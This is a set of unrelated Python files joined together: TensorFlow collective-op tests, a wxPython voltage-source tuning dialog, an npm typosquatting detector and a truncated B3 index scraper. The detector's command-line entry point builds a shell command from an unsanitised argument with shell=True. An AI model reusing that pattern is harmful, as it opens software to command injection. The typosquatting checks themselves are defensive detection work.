t1_cancellation_manager = cancellation.CancellationManager()
t2_cancellation_manager = cancellation.CancellationManager()
@def_function.function
def _collective_fn(x):
# Run an assertion to crash one of the two function executions running
# collectives. We explicitly cancel the other in response.
assert_op = check_ops.assert_equal(x, in_tensor)
with ops.control_dependencies([assert_op]):
return collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
collective_concrete = _collective_fn.get_concrete_function(in_tensor)
finish_mu = threading.Lock()
finishes = 0
def _placement_wrapper(device, x, my_cancellation, other_cancellation):
try:
with ops.device(device):
cancelable_collective = my_cancellation.get_cancelable_function(
collective_concrete)
return cancelable_collective(x)
except errors.InvalidArgumentError:
# `assert_equal` failed for this execution of the function. The other
# function would deadlock without cancellation.
other_cancellation.start_cancel()
except errors.CancelledError:
pass
nonlocal finishes
with finish_mu:
finishes += 1
t1 = threading.Thread(
target=_placement_wrapper,
args=(dev0, constant_op.constant([1.]), t1_cancellation_manager,
t2_cancellation_manager))
t2 = threading.Thread(
target=_placement_wrapper,
# Will cause the assertion to fail
args=(dev1, constant_op.constant([2.]), t2_cancellation_manager,
t1_cancellation_manager))
t1.start()
t2.start()
t1.join()
t2.join()
self.assertEqual(finishes, 2)
@combinations.generate(
combinations.times(collective_op_combinations, device_combination))
class TimeoutTest(test.TestCase, parameterized.TestCase):
def setUp(self):
_setup_context()
super().setUp()
def testTimeout(self, collective_op, device, communication):
timeout = 1.5
@def_function.function
def run(group_size, reported_group_size=None):
group_key = 20
instance_key = 30
tensor = [1., 2., 3., 4.]
results = []
if reported_group_size is None:
reported_group_size = group_size
for i in range(group_size):
with ops.device('/{}:{}'.format(device, i)):
input_data = constant_op.constant(tensor)
result = collective_op(
input_data,
group_size=reported_group_size,
group_key=group_key,
instance_key=instance_key,
communication_hint=communication,
timeout=timeout)
results.append(result)
return results
run(2, 2)
start_time = time.time()
with self.assertRaisesRegex(errors.DeadlineExceededError,
'Collective has timed out during execution'):
run(1, 2)
elapsed = time.time() - start_time
self.assertAllGreaterEqual(elapsed, timeout)
def testParamResolutionAfterTimeout(self, collective_op, device,
communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
timeout = 1.5
group_key = 20
instance_key = 30
input_data = constant_op.constant([1., 2., 3., 4.])
    # This timeout comes from param resolution.
with self.assertRaisesRegex(
errors.DeadlineExceededError,
'Collective has timed out waiting for other workers'):
with ops.device(dev0):
collective_op(
input_data,
group_size=2,
group_key=group_key,
instance_key=instance_key,
communication_hint=communication,
timeout=timeout)
# We launch the second device after the first device times out. This is to
# simulate the situation when other workers are slow and the timeout is
# short. It should error immediately.
with self.assertRaisesRegex(
errors.DeadlineExceededError,
'Collective has timed out waiting for other workers'):
with ops.device(dev1):
collective_op(
input_data,
group_size=2,
group_key=group_key,
instance_key=instance_key,
communication_hint=communication)
def testExecutionAfterTimeout(self, collective_op, device, communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
timeout = 1.5
group_key = 20
instance_key = 30
input_data = constant_op.constant([1., 2., 3., 4.])
@def_function.function
def run():
for device in [dev0, dev1]:
with ops.device(device):
collective_op(
input_data,
group_size=2,
group_key=group_key,
instance_key=instance_key,
communication_hint=communication,
timeout=timeout)
# Run a normal all-reduce to complete param resolution.
run()
with self.assertRaisesRegex(errors.DeadlineExceededError,
'Collective has timed out during execution'):
with ops.device(dev0):
collective_op(
input_data,
group_size=2,
group_key=group_key,
instance_key=instance_key,
communication_hint=communication,
timeout=timeout)
# We launch the second device after the first device times out. This is to
# simulate the situation when other workers are slow and the timeout is
# short. It should error immediately.
with self.assertRaisesRegex(errors.DeadlineExceededError,
'Collective has timed out during execution'):
with ops.device(dev1):
# No timeout.
collective_op(
input_data,
group_size=2,
group_key=group_key,
instance_key=instance_key,
communication_hint=communication)
class CommunicationHintTest(test.TestCase, parameterized.TestCase):
def setUp(self):
_setup_context()
super().setUp()
@combinations.generate(
combinations.times(collective_op_combinations,
combinations.combine(required_gpus=[0, 1])))
def testNCCLFallbackOnCPU(self, collective_op):
    # communication_hint=NCCL should work on CPU by falling back to RING. The
    # test doesn't actually require a GPU, only a GPU build; we include
    # required_gpus=1 so that it is also exercised with GPU builds.
dev0 = '/device:CPU:0'
dev1 = '/device:CPU:1'
group_key = 20
instance_key = 30
input_data = constant_op.constant([1., 2., 3., 4.])
@def_function.function
def run():
for device in [dev0, dev1]:
with ops.device(device):
collective_op(
input_data,
group_size=2,
group_key=group_key,
instance_key=instance_key,
communication_hint='NCCL')
run()
@combinations.generate(
combinations.times(
combinations.combine(
collective_op=[
combinations.NamedObject('all_reduce_v2',
CollectiveOpsV2.all_reduce),
combinations.NamedObject('all_gather_v2',
CollectiveOpsV2.all_gather),
],
mode='eager'), device_combination))
class OrderingTest(test.TestCase, parameterized.TestCase):
def setUp(self):
_setup_context()
super().setUp()
def testOrdering(self, collective_op, device, communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant([1.])
with ops.device(dev0):
token0 = resource_variable_ops.ResourceVariable(0.)
with ops.device(dev1):
token1 = resource_variable_ops.ResourceVariable(0.)
@def_function.function
def f():
# Launch the first collective with token.
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
ordering_token=token0.handle)
with ops.device(dev1):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
ordering_token=token1.handle)
# Launch the second collective without token.
with ops.device(dev0):
collective_op(in_tensor, group_size, group_key, instance_key)
with ops.device(dev1):
collective_op(in_tensor, group_size, group_key, instance_key)
# Launch the third collective with token.
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
ordering_token=token0.handle)
with ops.device(dev1):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
ordering_token=token1.handle)
graph = f.get_concrete_function().graph
for device in [dev0, dev1]:
# Try to find the third collective, which should have the first collective
# as a control input.
third = None
for op in graph.get_operations():
if (op.type.startswith('Collective') and op.device.endswith(device) and
op.control_inputs and
op.control_inputs[0].type.startswith('Collective')):
self.assertIsNone(third)
third = op
self.assertIsNotNone(third)
# Verify it's not the second collective by looking at the inputs.
self.assertTrue(any(v.dtype == dtypes.resource for v in third.inputs))
first = third.control_inputs[0]
self.assertEqual(third.device, first.device)
# Verify it's not the second collective by looking at the inputs.
self.assertTrue(any(v.dtype == dtypes.resource for v in first.inputs))
self.assertEmpty(first.control_inputs)
class InputPipelineTest(test.TestCase):
def setUp(self):
super().setUp()
_setup_context()
def testMap(self):
group_size = 2
group_key = 100
instance_key = 100
def create_dataset_and_fetch_one(t):
dataset = dataset_ops.Dataset.from_tensor_slices([t])
def reduce_fn(t):
return CollectiveOpsV2.all_reduce(
t,
group_size=group_size,
group_key=group_key,
instance_key=instance_key)
dataset = dataset.map(reduce_fn)
return next(iter(dataset))
@def_function.function
def f():
with ops.device('CPU:0'):
value0 = create_dataset_and_fetch_one([1.])
with ops.device('CPU:1'):
value1 = create_dataset_and_fetch_one([2.])
return value0, value1
self.assertAllEqual(self.evaluate(f()), [[3.], [3.]])
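# Reset the eager context and make sure at least four logical CPU devices are available for
# the multi-device tests.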
def _setup_context():
context._reset_context()
test_util.set_logical_devices_to_at_least('CPU', 4)
context.ensure_initialized()
if __name__ == '__main__':
os.environ['NCCL_DEBUG'] = 'INFO'
v2_compat.enable_v2_behavior()
test.main()
|
voltage_source.py
|
from functools import partial
from pubsub import pub
from threading import Thread
from time import sleep
import wx
from wx.lib.agw.floatspin import FloatSpin
from spacq.gui.tool.box import load_csv, save_csv, Dialog, MessageDialog
from spacq.interface.units import Quantity
"""
Configuration for a VoltageSource.
"""
class VoltageSourceTunerDialog(Dialog):
"""
A dialog for tuning a voltage source port.
"""
def __init__(self, parent, global_store, ok_callback, port, *args, **kwargs):
Dialog.__init__(self, parent, title='Port {0} tuning'.format(port.num))
self.global_store = global_store
self.ok_callback = ok_callback
self.port = port
# Dialog.
dialog_box = wx.BoxSizer(wx.VERTICAL)
## Self-calibration.
calibration_static_box = wx.StaticBox(self, label='DAC self-calibration')
calibration_box = wx.StaticBoxSizer(calibration_static_box, wx.VERTICAL)
dialog_box.Add(calibration_box, flag=wx.EXPAND|wx.ALL, border=5)
self.calibrate_button = wx.Button(self, label='Self-calibrate')
self.Bind(wx.EVT_BUTTON, self.OnCalibrate, self.calibrate_button)
calibration_box.Add(self.calibrate_button, flag=wx.EXPAND)
## Tuning.
tuning_static_box = wx.StaticBox(self, label='Tuning')
tuning_box = wx.StaticBoxSizer(tuning_static_box, wx.VERTICAL)
dialog_box.Add(tuning_box, flag=wx.EXPAND)
### Autotune.
autotuning_static_box = wx.StaticBox(self, label='Autotuning')
autotuning_box = wx.StaticBoxSizer(autotuning_static_box, wx.VERTICAL)
tuning_box.Add(autotuning_box, flag=wx.EXPAND|wx.ALL, border=5)
autotuning_sizer = wx.FlexGridSizer(rows=3, cols=2, hgap=5)
autotuning_box.Add(autotuning_sizer, flag=wx.CENTER)
autotuning_sizer.Add(wx.StaticText(self, label='Resource name:'),
flag=wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT)
self.resource_name_input = wx.TextCtrl(self, size=(300,-1))
autotuning_sizer.Add(self.resource_name_input)
autotuning_sizer.Add(wx.StaticText(self, label='Max:'),
flag=wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT)
self.automax_input = FloatSpin(self, value=1, min_val=-10, max_val=10, increment=1,
digits=5)
autotuning_sizer.Add(self.automax_input)
autotuning_sizer.Add(wx.StaticText(self, label='Min:'),
flag=wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT)
self.automin_input = FloatSpin(self, value=-1, min_val=-10, max_val=10, increment=1,
digits=5)
autotuning_sizer.Add(self.automin_input)
self.autotune_button = wx.Button(self, label='Autotune')
self.Bind(wx.EVT_BUTTON, self.OnAutotune, self.autotune_button)
autotuning_box.Add(self.autotune_button, flag=wx.EXPAND)
### Manual tune.
tuning_sizer = wx.FlexGridSizer(rows=2, cols=2, hgap=5)
tuning_box.Add(tuning_sizer, flag=wx.CENTER)
tuning_sizer.Add(wx.StaticText(self, label='Gain:'),
flag=wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT)
self.gain_input = FloatSpin(self, value=0, min_val=-1e6, max_val=1e6, increment=1,
digits=5)
tuning_sizer.Add(self.gain_input)
tuning_sizer.Add(wx.StaticText(self, label='Offset:'),
flag=wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT)
self.offset_input = FloatSpin(self, value=0, min_val=-1e6, max_val=1e6, increment=1,
digits=5)
tuning_sizer.Add(self.offset_input)
## End buttons.
button_box = wx.BoxSizer(wx.HORIZONTAL)
dialog_box.Add(button_box, flag=wx.CENTER|wx.ALL, border=5)
ok_button = wx.Button(self, wx.ID_OK)
self.Bind(wx.EVT_BUTTON, self.OnOk, ok_button)
button_box.Add(ok_button)
cancel_button = wx.Button(self, wx.ID_CANCEL)
button_box.Add(cancel_button)
self.SetSizerAndFit(dialog_box)
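    # Runs on a worker thread (started in OnAutotune); results are pushed back to the GUI thread via wx.CallAfter.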
def autotune(self, resource):
gain, offset = self.port.autotune(resource, set_result=False,
min_value=self.automin_input.GetValue(),
max_value=self.automax_input.GetValue())
wx.CallAfter(self.gain_input.SetValue, gain)
wx.CallAfter(self.offset_input.SetValue, offset)
wx.CallAfter(self.autotune_button.Enable)
def self_calbrate(self):
self.port.apply_settings(calibrate=True)
sleep(self.port.calibration_delay)
wx.CallAfter(self.calibrate_button.Enable)
def SetValue(self, gain, offset):
self.gain_input.SetValue(gain)
self.offset_input.SetValue(offset)
def GetValue(self):
return (self.gain_input.GetValue(), self.offset_input.GetValue())
def OnAutotune(self, evt=None):
name = self.resource_name_input.Value
if not name:
MessageDialog(self, 'No resource provided').Show()
return
try:
resource = self.global_store.resources[name]
except KeyError:
MessageDialog(self, name, 'Missing resource').Show()
return
if not resource.readable:
MessageDialog(self, name, 'Unreadable resource').Show()
return
self.autotune_button.Disable()
thr = Thread(target=self.autotune, args=(resource,))
thr.daemon = True
thr.start()
def OnCalibrate(self, evt=None):
self.calibrate_button.Disable()
thr = Thread(target=self.self_calbrate)
thr.daemon = True
thr.start()
def OnOk(self, evt=None):
self.ok_callback(self)
self.Destroy()
class VoltageSourceSettingsPanel(wx.Panel):
"""
All the settings for a voltage source.
"""
def __init__(self, parent, global_store, vsrc, *args, **kwargs):
wx.Panel.__init__(self, parent, *args, **kwargs)
self.global_store = global_store
self.vsrc = vsrc
self.port_value_inputs = []
self.port_buttons = []
# Panel.
panel_box = wx.BoxSizer(wx.VERTICAL)
## Ports.
ports_box = wx.FlexGridSizer(rows=8, cols=2)
panel_box.Add(ports_box)
for port in xrange(16):
port_static_box = wx.StaticBox(self, label='Port {0} '.format(port))
port_box = wx.StaticBoxSizer(port_static_box, wx.HORIZONTAL)
ports_box.Add(port_box, flag=wx.ALL, border=5)
if port < 6:
spin = FloatSpin(self, value=0, min_val=-1, max_val=1, increment=1, digits=6)
elif port < 12:
spin = FloatSpin(self, value=0, min_val=-2.5, max_val=2.5, increment=1, digits=6)
else:
spin = FloatSpin(self, value=0, min_val=-10, max_val=10, increment=1, digits=6)
self.port_value_inputs.append(spin)
port_box.Add(spin)
port_box.Add(wx.StaticText(self, label='V'))
set_button = wx.Button(self, label='Set', style=wx.BU_EXACTFIT)
set_button.Bind(wx.EVT_BUTTON, partial(self.OnSetVoltage, port))
port_box.Add(set_button)
tune_button = wx.Button(self, label='Tune...', style=wx.BU_EXACTFIT)
tune_button.Bind(wx.EVT_BUTTON, partial(self.OnTune, port))
port_box.Add(tune_button)
self.port_buttons.append((set_button, tune_button))
## All ports.
button_static_box = wx.StaticBox(self, label='All ports')
button_box = wx.StaticBoxSizer(button_static_box, wx.HORIZONTAL)
panel_box.Add(button_box, flag=wx.CENTER)
### Zero.
zero_all_button = wx.Button(self, label='Zero')
self.Bind(wx.EVT_BUTTON, self.OnZeroAll, zero_all_button)
button_box.Add(zero_all_button, flag=wx.CENTER)
### Self-calibrate.
self.calibrate_all_button = wx.Button(self, label='Self-calibrate')
self.Bind(wx.EVT_BUTTON, self.OnCalibrateAll, self.calibrate_all_button)
button_box.Add(self.calibrate_all_button, flag=wx.CENTER)
### Load tuning.
tuning_data_static_box = wx.StaticBox(self, label='Tuning data')
tuning_data_box = wx.StaticBoxSizer(tuning_data_static_box, wx.HORIZONTAL)
button_box.Add(tuning_data_box)
#### Save.
tuning_data_save_button = wx.Button(self, label='Save...')
self.Bind(wx.EVT_BUTTON, self.OnSave, tuning_data_save_button)
tuning_data_box.Add(tuning_data_save_button)
#### Load.
tuning_data_load_button = wx.Button(self, label='Load...')
self.Bind(wx.EVT_BUTTON, self.OnLoad, tuning_data_load_button)
tuning_data_box.Add(tuning_data_load_button)
self.SetSizer(panel_box)
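    # Start self-calibration on every port, wait out the longest calibration delay, then re-enable the button from the GUI thread.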
def self_calbrate_all(self):
delay = 0 # s
for port in self.vsrc.ports:
# Use the largest delay.
if port.calibration_delay > delay:
delay = port.calibration_delay
port.apply_settings(calibrate=True)
sleep(delay)
wx.CallAfter(self.calibrate_all_button.Enable)
def zero_all(self):
for port in self.vsrc.ports:
port.voltage = Quantity(0.0, 'V')
def OnSetVoltage(self, port_num, evt=None):
try:
self.vsrc.ports[port_num].voltage = Quantity(self.port_value_inputs[port_num].GetValue(), 'V')
except ValueError as e:
MessageDialog(self, str(e), 'Invalid value').Show()
def OnTune(self, port_num, evt=None):
port = self.vsrc.ports[port_num]
def ok_callback(dlg):
port.gain, port.offset = dlg.GetValue()
dlg = VoltageSourceTunerDialog(self, self.global_store, ok_callback, port)
dlg.SetValue(port.gain, port.offset)
dlg.Show()
def OnCalibrateAll(self, evt=None):
self.calibrate_all_button.Disable()
thr = Thread(target=self.self_calbrate_all)
thr.daemon = True
thr.start()
def OnZeroAll(self, evt=None):
thr = Thread(target=self.zero_all)
thr.daemon = True
thr.start()
def OnSave(self, evt=None):
values = [[port.gain, port.offset] for port in self.vsrc.ports]
try:
save_csv(self, values)
except IOError as e:
MessageDialog(self, str(e), 'Save error').Show()
return
def OnLoad(self, evt=None):
try:
result = load_csv(self)
if result is None:
return
has_header, values, _ = result
if has_header:
port_values = values[1:]
else:
port_values = values
if len(port_values) != len(self.vsrc.ports):
raise ValueError('Invalid number of ports.')
for i, port_value in enumerate(port_values):
if len(port_value) != 2:
raise ValueError('Invalid number of settings for port {0}.'.format(i))
try:
float(port_value[0])
float(port_value[1])
except TypeError:
raise ValueError('Not a number for port {0}.'.format(i))
except (IOError, ValueError) as e:
MessageDialog(self, str(e), 'Load error').Show()
return
for port, values in zip(self.vsrc.ports, port_values):
port.gain = float(values[0])
port.offset = float(values[1])
class VoltageSourceSettingsDialog(Dialog):
"""
A wrapper for VoltageSourceSettingsPanel.
"""
def __init__(self, parent, global_store, vsrc_name, *args, **kwargs):
# If the device doesn't exist, give up.
try:
vsrc = global_store.devices[vsrc_name].device
except (KeyError, AttributeError):
self.Destroy()
return
Dialog.__init__(self, parent, title='Voltage source settings', *args, **kwargs)
self.vsrc_name = vsrc_name
# Dialog.
dialog_box = wx.BoxSizer(wx.VERTICAL)
## Settings panel.
self.panel = VoltageSourceSettingsPanel(self, global_store, vsrc)
dialog_box.Add(self.panel)
self.SetSizerAndFit(dialog_box)
# Subscriptions.
pub.subscribe(self.msg_device, 'device.added')
pub.subscribe(self.msg_device, 'device.removed')
def msg_device(self, name, value=None):
if name == self.vsrc_name:
# Device has changed, so we can't trust it anymore.
self.Destroy()
return
|
typosquatting.py
|
# Typosquatting Detection Scheme (npm)
from itertools import permutations
from functools import lru_cache
import re
delimiter_regex = re.compile(r'[-._]')
delimiters = ['', '.', '-', '_']
version_number_regex = re.compile(r'^(.*?)[-._]?\d$')
scope_regex = re.compile('^@(.*?)/.+$')
allowed_characters = 'abcdefghijklmnopqrstuvwxyz1234567890.-_'
typos = {
'1': ['2', 'q', 'i', 'l'],
'2': ['1', 'q', 'w', '3'],
'3': ['2', 'w', 'e', '4'],
'4': ['3', 'e', 'r', '5'],
'5': ['4', 'r', 't', '6', 's'],
'6': ['5', 't', 'y', '7'],
'7': ['6', 'y', 'u', '8'],
'8': ['7', 'u', 'i', '9'],
'9': ['8', 'i', 'o', '0'],
'0': ['9', 'o', 'p', '-'],
'-': ['_', '0', 'p', '.', ''],
'_': ['-', '0', 'p', '.', ''],
'q': ['1', '2', 'w', 'a'],
'w': ['2', '3', 'e', 's', 'a', 'q', 'vv'],
'e': ['3', '4', 'r', 'd', 's', 'w'],
'r': ['4', '5', 't', 'f', 'd', 'e'],
't': ['5', '6', 'y', 'g', 'f', 'r'],
'y': ['6', '7', 'u', 'h', 't', 'i'],
'u': ['7', '8', 'i', 'j', 'y', 'v'],
'i': ['1', '8', '9', 'o', 'l', 'k', 'j', 'u', 'y'],
'o': ['9', '0', 'p', 'l', 'i'],
'p': ['0', '-', 'o'],
'a': ['q', 'w', 's', 'z'],
's': ['w', 'd', 'x', 'z', 'a', '5'],
'd': ['e', 'r', 'f', 'c', 'x', 's'],
'f': ['r', 'g', 'v', 'c', 'd'],
'g': ['t', 'h', 'b', 'v', 'f'],
'h': ['y', 'j', 'n', 'b', 'g'],
'j': ['u', 'i', 'k', 'm', 'n', 'h'],
'k': ['i', 'o', 'l', 'm', 'j'],
'l': ['i', 'o', 'p', 'k', '1'],
'z': ['a', 's', 'x'],
'x': ['z', 's', 'd', 'c'],
'c': ['x', 'd', 'f', 'v'],
'v': ['c', 'f', 'g', 'b', 'u'],
'b': ['v', 'g', 'h', 'n'],
'n': ['b', 'h', 'j', 'm'],
'm': ['n', 'j', 'k', 'rn'],
'.': ['-', '_', '']
}
# Set containing the names of all packages considered to be popular
popular_packages = set(open('../data/npm_popular_packages').read().splitlines())
# pandas dataframe containing the names and download counts of all packages, call scan_all_init to initialize
packages_df = None
all_packages = None
# check if two packages have the same scope
def same_scope(p1, p2):
p1_match = scope_regex.match(p1)
p2_match = scope_regex.match(p2)
if p1_match is None or p2_match is None:
return False
return p1_match.group(1) == p2_match.group(1)
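# Worked example (illustrative, not used by the detector): scoped names such as
# '@babel/core' and '@babel/cli' share the scope 'babel', so the checks below
# will not flag one as squatting the other; unscoped names never match the
# scope regex.
def _demo_same_scope():
    """Tiny sanity check for same_scope()."""
    assert same_scope('@babel/core', '@babel/cli')      # both share the scope 'babel'
    assert not same_scope('@babel/core', 'babel-core')  # only one name is scoped
    assert not same_scope('lodash', 'loadsh')           # unscoped names never match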
# 'reeact' => 'react'
def repeated_characters(package_name, return_all=False, package_list=popular_packages):
if return_all:
candidates = []
for i, c in enumerate(package_name):
if i + 1 < len(package_name) and package_name[i + 1] == c:
s = package_name[:i] + package_name[i + 1:]
if s in package_list and not same_scope(package_name, s) and s != package_name:
if return_all:
candidates.append(s)
else:
return s
if return_all and candidates != []:
return candidates
return None
# 'evnt-stream' -> 'event-stream'
def omitted_chars(package_name, return_all=False, package_list=popular_packages):
if len(package_name) < 4:
return None
if return_all:
candidates = []
for i in range(len(package_name) + 1):
for c in allowed_characters:
s = package_name[:i] + c + package_name[i:]
if s in package_list and not same_scope(package_name, s) and s != package_name:
if return_all:
candidates.append(s)
else:
return s
if return_all and candidates != []:
return candidates
return None
# 'loadsh' => 'lodash'
def swapped_characters(package_name, return_all=False, package_list=popular_packages):
if return_all:
candidates = []
for i in range(len(package_name) - 1):
a = list(package_name)
t = a[i]
a[i] = a[i + 1]
a[i + 1] = t
s = ''.join(a)
if s in package_list and not same_scope(package_name, s) and s != package_name:
if return_all:
candidates.append(s)
else:
return s
if return_all and candidates != []:
return candidates
return None
# 'stream-event' => 'event-stream'
# 'event.stream' => 'event-stream'
# 'de-bug' => 'debug'
def swapped_words(package_name, return_all=False, package_list=popular_packages):
if return_all:
candidates = []
if delimiter_regex.search(package_name) is not None:
tokens = delimiter_regex.sub(' ', package_name).split()
if len(tokens) > 8:
return None
for p in permutations(tokens):
for d in delimiters:
s = d.join(p)
if s in package_list and not same_scope(package_name, s) and s != package_name:
if return_all:
candidates.append(s)
else:
return s
if return_all and candidates != []:
return candidates
return None
# '1odash' => 'lodash'
# 'teqeusts' => 'requests'
def common_typos(package_name, return_all=False, package_list=popular_packages):
if return_all:
candidates = []
for i, c in enumerate(package_name):
if c in typos:
for t in typos[c]:
s = list(package_name)
s[i] = t
s = ''.join(s)
if s in package_list and not same_scope(package_name, s) and s != package_name:
if return_all:
candidates.append(s)
else:
return s
if return_all and candidates != []:
return candidates
return None
# 'react-2' => 'react'
# 'react2' => 'react'
def version_numbers(package_name, package_list=popular_packages):
m = version_number_regex.match(package_name)
if m is not None:
s = m.group(1)
if s in package_list and not same_scope(package_name, s) and s != package_name:
return s
return None
# run all tests on given package name, return potential typosquatting targets
def run_tests(package_name):
if package_name not in popular_packages:
results = [
repeated_characters(package_name),
omitted_chars(package_name),
swapped_characters(package_name),
swapped_words(package_name),
common_typos(package_name),
version_numbers(package_name)
]
# remove None's
        results = list(filter(lambda x: x is not None and x != '', results))
# flatten
r = []
for s in results:
if type(s) == list:
for e in s:
r.append(e)
else:
r.append(s)
results = list(set(r))
if len(results) != 0:
return results
return None
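# --- Usage sketch (illustrative) ---
# Each check above can be called on its own, or bundled through run_tests().
# The package names below are made up; whether anything is returned depends on
# the contents of ../data/npm_popular_packages loaded at import time.
def _demo_checks():
    print(repeated_characters('reeact'))  # 'react' if 'react' is in the popular set
    print(omitted_chars('evnt-stream'))   # 'event-stream' if present
    print(swapped_characters('loadsh'))   # 'lodash' if present
    print(common_typos('1odash'))         # 'lodash' if present
    print(version_numbers('react2'))      # 'react' if present
    print(run_tests('reeact'))            # combined, de-duplicated list or None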
# run all tests on given package name, return potential typosquatting targets
def run_tests_show_all(package_name):
if all_packages is None:
scan_all_init()
results = [
repeated_characters(package_name, return_all=True, package_list=all_packages),
omitted_chars(package_name, return_all=True, package_list=all_packages),
swapped_characters(package_name, return_all=True, package_list=all_packages),
swapped_words(package_name, return_all=True, package_list=all_packages),
common_typos(package_name, return_all=True, package_list=all_packages),
version_numbers(package_name, package_list=all_packages)
]
# remove None's
    results = list(filter(lambda x: x is not None and x != '', results))
# flatten
r = []
for s in results:
if type(s) == list:
for e in s:
r.append(e)
else:
r.append(s)
results = list(set(r))
if len(results) != 0:
return results
return None
# get results corresponding to each signal
def run_tests_get_signals(package_name):
if package_name not in popular_packages:
return {
'repeated_chars': repeated_characters(package_name),
'omitted_chars': omitted_chars(package_name),
'swapped_chars': swapped_characters(package_name),
'swapped_words': swapped_words(package_name),
'common_typos': common_typos(package_name),
'version_numbers': version_numbers(package_name)
}
else:
return None
# set up tools required for scanning all packages
def scan_all_init():
global pd
import pandas as pd
global packages_df
packages_df = pd.read_csv('../data/npm_download_counts.csv')
global all_packages
all_packages = set(packages_df.package_name.values)
global threading
import threading
global lock
lock = threading.Lock()
# gets download count for given package
def get_download_count(package_name):
if packages_df is None:
scan_all_init()
if package_name not in packages_df.package_name.values:
return 0
return packages_df.loc[packages_df.package_name == package_name].weekly_downloads.values[0]
# split list into evenly sized chunks
def chunks(lst, n):
"""Yield successive n-sized chunks from lst."""
for i in range(0, len(lst), n):
yield lst[i:i + n]
# returns the most popular package with a name that could be typosquatting the given package
@lru_cache(maxsize=10000)
def get_most_popular_candidate(package_name):
candidates = run_tests_show_all(package_name)
if candidates is None:
return None
# get most popular target
most_popular_candidate = candidates[0]
popularity = get_download_count(candidates[0])
for c in candidates:
if get_download_count(c) > popularity:
most_popular_candidate = c
popularity = get_download_count(c)
return most_popular_candidate
# thread target function used to scan all packages
def scan_all_thread_target(lines, log):
counter = 0
for line in lines:
tokens = line.split(',')
package_name = tokens[0]
dependencies = tokens[1:]
final_string = package_name
for dependency in dependencies:
candidate = get_most_popular_candidate(dependency)
if candidate is not None:
final_string += (',' + dependency + ',' + candidate)
final_string += '\n'
lock.acquire()
log.write(final_string)
counter += 1
if counter == 100:
log.flush()
counter = 0
lock.release()
# scan all packages for transitive results
def scan_all(dependencies_filename, transitive_output_filename, threads):
if all_packages is None:
scan_all_init()
n_threads = threads
threads = []
# get most popular typosquatting target for every package in the given list
lines = open(dependencies_filename).read().splitlines()
log = open(transitive_output_filename, 'a')
all_chunks = chunks(lines, int(len(lines) / n_threads) + 1)
for _ in range(n_threads):
current_chunk = next(all_chunks)
t = threading.Thread(target=scan_all_thread_target, args=(current_chunk,log,))
t.start()
threads.append(t)
for t in threads:
t.join()
log.close()
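# --- Usage sketch for the transitive scan (file names are hypothetical) ---
# scan_all() reads a text file with one line per package of the form
# "<package>,<dep1>,<dep2>,...", looks up the most popular typosquatting
# candidate for every dependency, and writes one output line per input package;
# each dependency that has a candidate appends a ",<dep>,<candidate>" pair to
# that line. scan_all_init() is called lazily, so pandas and the download-count
# CSV are only needed for this code path.
def _demo_scan_all():
    scan_all(dependencies_filename='../data/npm_dependencies.csv',
             transitive_output_filename='../data/npm_transitive_hits.csv',
             threads=8)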
# get signal count statistics
def get_signal_counts():
if all_packages is None:
scan_all_init()
log = open('../data/npm_signal_counts', 'w')
log.write('package_name,weekly_downloads,repeated_characters,omitted_characters,swapped_characters,swapped_words,common_typos,version_numbers\n')
for package in all_packages:
package_name = str(package)
results = run_tests_get_signals(package_name)
if results is not None:
if set(results.values()) != {None}:
final_string = package_name + ',' + str(get_download_count(package_name))
final_string += ',' + ','.join(['' if x is None else x for x in results.values()])
final_string += '\n'
log.write(final_string)
log.close()
if __name__ == '__main__':
import sys
    if len(sys.argv) < 2:
        print('Usage: py typosquatting.py <package_name>')
        sys.exit(1)
import subprocess
stdout = subprocess.check_output('node get_npm_deps_cli.js {}'.format(sys.argv[1]), shell=True).decode('utf8')
dependencies = stdout.split('Dependencies:\n')[1].splitlines()
alert = False
for dependency in dependencies:
r = run_tests(dependency)
if r is not None:
alert = True
print('Dependency \'{}\' could be typosquatting {}'.format(dependency, set(r)))
if alert == False:
print('No typosquatting detected for \'{}\''.format(sys.argv[1]))
|
b3_indexes.py
|
# -*- coding: utf-8 -*-
"""
Created on Wed Sep 10 22:00:13 2018
@author: Gaston Guillaux
"""
import os
import time
import shutil
import requests
import pandas as pd
from threading import Thread
from datetime import datetime
from bs4 import BeautifulSoup as bs
# export the Ibovespa composition to csv
def get_ibov():
now = datetime.now()
url = r'http://bvmf.bmfbovespa.com.br/indices/ResumoCarteiraQuadrimestre.aspx?Indice=IBOV&idioma=en-us'
ibov_html = requests.get(url)
ibov_df_list = pd.read_html(ibov_html.text)
ibov_df = ibov_df_list[0]
csv_file = r'c:\temp\auxpy\ibov_' + now.strftime('%Y-%m-%d_%H%M%S.csv')
ibov_df.to_csv(csv_file, index=False)
#==================================================================================================
#get url of all b3 indexes
def get_b3_indexes_urls():
url = 'http://www.bmfbovespa.com.br/pt_br/produtos/indices/'
indices = {}
pagina_indices = requests.get(url)
soup = bs(pagina_indices.text, 'html.parser')
hrefs = [href for href in soup.select('a[href*="indice"]') if href.getText() == 'Saiba mais']
for i in hrefs:
aux = i['href'].replace('./','')
link = url + aux
name = i.parent.parent.parent.select('.subheader')[0].getText()
indices[name] = {}
indices[name]['url'] = link
return indices
def get_url(index, indexes):
url = indexes[index]['url']
pagina = requests.get(url)
soup = bs(pagina.text, 'html.parser')
try:
href = soup.select('a[href*="composicao"]')[0]['href'].replace('./', '')
indexes[index]['composition'] = trim_url(url) + href
except Exception as e:
indexes[index]['composition'] = '*** failed to get composition *** . Error message = ' + str(e)
def get_b3_indexes_composition_url():
indexes = get_b3_indexes_urls()
threads = []
for index in indexes:
t = Thread(target=get_url, args=([index, indexes]))
threads.append(t)
t.start()
[t.join() for t in threads]
return indexes
#==================================================================================================
def get_composition(i, indexes, csv_path):
